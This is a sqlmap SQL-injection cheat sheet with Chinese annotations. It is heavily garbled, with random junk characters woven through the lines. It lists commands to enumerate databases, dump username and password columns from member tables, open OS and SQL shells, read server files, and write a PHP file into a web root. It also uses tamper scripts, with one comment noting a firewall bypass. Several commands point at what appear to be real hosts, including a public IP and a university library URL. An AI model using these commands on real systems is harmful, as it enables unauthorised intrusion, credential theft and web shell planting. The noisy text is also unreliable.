/pentest/database/sqlmap
* F/ p- e Q. N/ |! [* t0 k# I+ {* P
update :::::> in the folder after execute following order : svn update
" X) }0 g, c+ E2 M+ T. f1 X/ _; `6 R& z
sqlmap.py -r 1.txt --current-db
+ Q3 ]: w3 V' ^ y/ o, D
) j2 w3 F7 w, |7 X3 o# A: ~$ Uv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
6 L6 I# a6 ^2 S0 k2 ]8 z- O0 C1 Q0 n9 ~- A
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
, ?' H3 P A. Y. W A猜解数据库
+ `$ U0 e7 D* y) S o" _% X./sqlmap.py -u "injection-url" --dbs0 h. Q) D# }/ c; @8 c8 r3 s
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"& t% N: T6 A. G
# |0 @6 m. Z+ Z% ?. f' l+ @7 R猜解表名4 \1 Q" y7 K& X. r) s9 m( q& I
./sqlmap.py -u "injection-url" -D database_name --tables
( c" @' }: W" S1 _$ H9 D! ^+ J u$ `8 |4 ]
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
# p. C0 Y5 c/ ?& ?6 {8 ksqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
, o0 o7 k, t( y& N2 k' T. H; k) k& t9 F) x6 |( Y D
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
5 j4 T, V* J5 {" ]8 v" u" }/ Z$ \1 ~2 x* ?- W% b% d# C
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
3 k) @# z6 w. _" \sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"2 Q) c9 X4 g6 K7 y8 p; y
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 3 P; W; o( j' [% F6 G% k
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py" _2 X, R) |+ X" r/ y- T: J
( Q( b% b; C, E4 _9 ~1 t1 m4 S* {
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
+ w( D( B$ i+ a/ Tsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
4 M% [+ s5 n6 Bsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"1 S! @" s0 W) P n- r: |3 R% b( A
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
! K- c6 A) @3 P$ p4 B/ O5 O) }sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump. G& Y5 H* {/ U+ a7 F j" E7 N5 n. d
- @/ s6 A/ O N8 F) d4 k7 P+ zsqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
2 J+ v3 j8 N% D5 x8 f" r; T# tsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"7 @0 l/ G+ ^1 k5 c
" s9 l5 F* L) w
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"% W0 p, n' u) t. J2 F+ e. Y
猜解列名
8 w' ^) |' ?! e/ z% Z./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
. c( @" F% a& U8 q, D$ Q& Y: O2 N/ D& f4 T
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
8 Y; `3 L' e% M5 h9 tsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
% g) I- T! l2 R7 d$ isqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"* P! J& |3 V, X* \) b, k
g' I. [+ Y0 u# |: usqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
. e8 ?) ^+ U5 m0 k$ r1 D&submit=Go& f- ] e* C/ P3 E# q# B% B' ^7 k- [
猜解值, K" J+ ?& a5 `* [7 q
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump1 e) M& A0 R! A4 q$ A+ \; J$ E9 T+ V
========================================================
/ W1 c9 \8 I! ?$ _$ i& s: ?搜索表名中包括mana字符的
( A4 F- @$ o: ]4 e/ ?1 \# @( t2 m/sqlmap.py -u "injection-url" -T mana --search; {' X+ Y4 ] w( t' L) _+ ^9 f
返回一个交互式sql shell# z$ j; B5 R" t6 |5 r9 T
/sqlmap.py -u "injection-url" --sql-shell
( W; z' O% R2 U y/ @* p- t读取指定文件(需权限)
1 y6 j: n* G* @9 B; ~/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
/ L) @4 D/ Y$ z4 s查看当前 用户 及 数据库
/ a, e6 e5 c# }% ?/sqlmap.py -u "injection-url" --current-user --current-db
5 Y$ V2 h$ j/ _( k( H7 R2 U本地文件 写入 远程目标绝对路径2 h. G) w" k6 \$ b3 i8 s/ m0 T0 v
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
$ F' O$ R ~$ b3 y4 `sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
* j/ u7 N4 v6 i# ] h/ A# W) D) |0 T9 G9 X
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径0 j2 o- z& S9 r' N/ n
查看某用的权限
6 p: s9 J' Y! ^+ F7 c/sqlmap.py -u "injection-url" --privileges -U root7 N4 j+ z2 ]/ m& d& ^
查看当前用户是否为dba
3 h, ]- a! ~3 u; p% D! l; J2 J/sqlmap.py -u "injection-url" --is-dba
9 X+ M4 F# S9 J4 A* S& _读取所有数据库用户或指定数据库用户的密码
* j1 d0 e5 s# E6 msqlmap.py -r 1.txt --users --passwords( ^6 h" O( P# |8 ^- R, ?
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
6 y, X: W( |- T9 G v9 {7 l4 [4 K8 _0 R, Q
/sqlmap.py -u "injection-url" --passwords -U root% b- ? `- b _. w% m4 Q
. h" Q4 Y0 `/ w9 f. `
--start&&--stop 与 --first&&--last 的区别
9 [2 B. R. u/ C4 P/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
3 `* m T, v+ e3 J$ Q. c4 i
3 v& U- `& ?" m% O% Z/ d: s1 z从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)$ q! S1 }; u e. R) B4 ^
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
$ K" F2 G! S2 k2 H( f/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns7 v" p0 U2 H* O
0 i, t* m2 o* @/ r; T
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)( S* M% Z! Q7 ^
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
$ ]: }) T" a- y7 l; ?, h3 d
y& P+ Y% i! s S$ ]' d. M |